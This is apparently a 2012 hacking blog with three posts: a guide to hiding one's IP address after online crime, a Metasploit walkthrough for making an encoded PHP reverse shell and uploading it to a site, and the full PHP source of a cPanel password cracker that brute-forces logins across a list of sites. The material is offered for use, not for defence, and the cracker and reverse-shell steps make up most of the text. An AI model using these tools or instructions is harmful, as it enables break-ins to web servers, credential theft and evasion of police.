Wednesday, 20 June 2012

IP Address Spoofing By Terrorists

When we send emails and browse internet our computer global IP Address automatically goes to service provider company server like gmail ,msn ,PayPal etc.
when any one done online crime like credit card fraud,send email to anyone hacker can easily traceable by Govt.police,etc. but professional hackers hide their IP address by proxy,tunnel,VNC etc.
Proxy is old trick we show your untraceable IP spoofing so you can hide your real IP into another IP address that provided by http://www.usaip.eu/en/ 

step1
before IP spoofing check your original geo. location from here http://whatismyipaddress.com/



step2
download VNC connection file from following website 

step3
Now open usaip.pbk file select any other server , here I select china server
  

step4
after open the file and connect to any server with demo as use and demo as password
----------------------------
user name-----> demo
password-----> demo
----------------------------

 

step5
at the last after IP spoofing check your geo. location from here http://whatismyipaddress.com/


 before IP spoofing my geo. location is India 
 after IP spoofing my geo.location is china 

Monday, 4 June 2012

PHP Connect Back with ShellCode

First You need your IP Address Ready Besure that it is External IP Address Not internal
And a Random Port

Make sure that the PORT is OPEN in your Router

Now Enter into Metasploit and type the following command




msf > use payload/php/reverse_php
msf payload(reverse_php) > set LHOST YOUR_IP_ADDRESS
LHOST => YOUR_IP_ADDRESS
msf payload(reverse_php) > set LPORT YOUR_PORT
LPORT => YOUR_PORT
msf payload(reverse_php) > set ENCODER php/base64
ENCODER => php/base64
msf payload(reverse_php) > generate -t raw

Once you have done with above command it generates a Shell code which is encoded with Base64
Now copy the whole Generated string into a php file like this

<?
eval(base64_decode("CQkkaXBhZGRyPWxvbmcya....."));
?>

Now save the file as something.php and upload the file onto any site and open in the url

example:

if you have uploaded the file as shell.php

now open the url http://somesite.com/shell.php

Now you would get a shell back at your Metasploit
Enjoy Exploiting :)

Sunday, 3 June 2012

Private Cpanel Cracker (Web hacking)

<?php
set_time_limit(0);

/********************************************************************
* Private Cpanel Cracker
* Coded by Miyachung
* miyachung@hotmail.com
* Janissaries.Org
* Demonstration -> http://www.youtube.com/watch?v=mLkudfIAPgA
*********************************************************************/

class cracker
{

 public  $sitelist;
 public  $passlist;
 
 public function calis()
 {
   $usernames   =  $this->make_username();
   $sitelist  = explode("\n",$this->openfile($this->sitelist)); 
   $passlist  = explode("\n",$this->openfile($this->passlist));
   $increment = 0;
   
   echo "\n\n[*]Site list -> $this->sitelist\n";
   echo "[*]Pass list -> $this->passlist\n";
   echo "[*]Total urls -> ".count($sitelist)."\n";
   echo "[*]Total pass -> ".count($passlist)."\n";
   echo "[*]Cracking started\n\n";
   
   foreach($sitelist as $id => $site)
   {
   $increment++;
   $site = trim($site);
   echo "-------------------------------------------------------\n";
   echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n";
   if(eregi('http',$site)){
   $site = str_replace("http://","https://",$site);
   }else{ 
   $site = "https://$site";
   }
   $site= $site.":2083";
   
   if(!$this->pass_site($site))
   {
   echo "[-]Not cpanel,passing site\n";
   echo "-------------------------------------------------------\n\n";
   continue;
   }

   echo "[*]Connected Cpanel [OK]\n";
   echo "[*]Username: ".$usernames[$id]."\n";
   echo "[*]Loaded ".count($passlist)." passwords\n";
   echo "[*]Coded by Miyachung ||| Janissaries.Org\n";
    foreach($passlist as $pass)
    {
     $cracked = false;
     
     $pass=trim($pass);
     
     $result = $this->post($site,$usernames[$id],$pass);
     
     if(preg_match('/security_token/',$result))
     {
     $cracked = true;
     echo "[+]$pass password cracked for $usernames[$id]\n";
     echo "-------------------------------------------------------\n\n";
     $this->savefile("$site|$usernames[$id]|$pass");
     break;
     }
     
    }
   if(!$cracked){echo "[-]Not found\n";echo "-----------------------------------\n\n";}
   }
 
 }
 
 private function make_username()
 {
   $op = explode("\n",$this->openfile($this->sitelist));
   foreach($op as $site)
   {
   
   if(eregi('http://',$site)) $site  = str_replace("http://","",$site);
   if(!eregi('www',$site))    $site  = "www.".$site;
   
   $site = explode(".",$site);
   $site = str_replace("-","",$site[1]);
   
   $usernames[] = substr($site,0,8);
   
   }
   return $usernames;
 }
 
 public function lists()
 {
   echo "[!]Site list: ";
   $sitelist = fgets(STDIN);
   $sitelist = str_replace("\r\n","",$sitelist);
   $sitelist = trim($sitelist);
   echo "[!]Pass list: ";
   $passlist = fgets(STDIN);
   $passlist = str_replace("\r\n","",$passlist);
   $passlist = trim($passlist);
   
   return array($sitelist,$passlist);
 }
 
 private function post($site,$user,$pass)
 {
   $curl = curl_init();
   curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
   curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
   curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
   curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
   curl_setopt($curl,CURLOPT_TIMEOUT,7);
   curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
   curl_setopt($curl,CURLOPT_POST,1);
   curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
   $exec = curl_exec($curl);
   return $exec;
 }
 
 private function pass_site($site)
 {
   $curl = curl_init();
   curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
   curl_setopt($curl,CURLOPT_URL,$site);
   curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
   curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
   curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
   curl_setopt($curl,CURLOPT_TIMEOUT,7);
   $exec = curl_exec($curl);
   $info = curl_getinfo($curl);
   
   if($info['http_code'] != 0)
   {
   return true;
   }
   else
   {
   return false;
   }
 
 }
 
 private function openfile($file)
 {
   $file = @file_get_contents($file);
   if(!$file) exit("WTF File not found ?");
   return $file;
 }
 
 private function savefile($content)
 {
   $file = fopen('crackerlog.txt','ab');
   fwrite($file,$content."\r\n");
   fclose($file);
   return $file;
 }

}

$class      =   new cracker();
$lists      =   $class->lists();

   if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? "); 
   
$class->sitelist   =   $lists[0];
$class->passlist   =   $lists[1];
$class->calis();


?>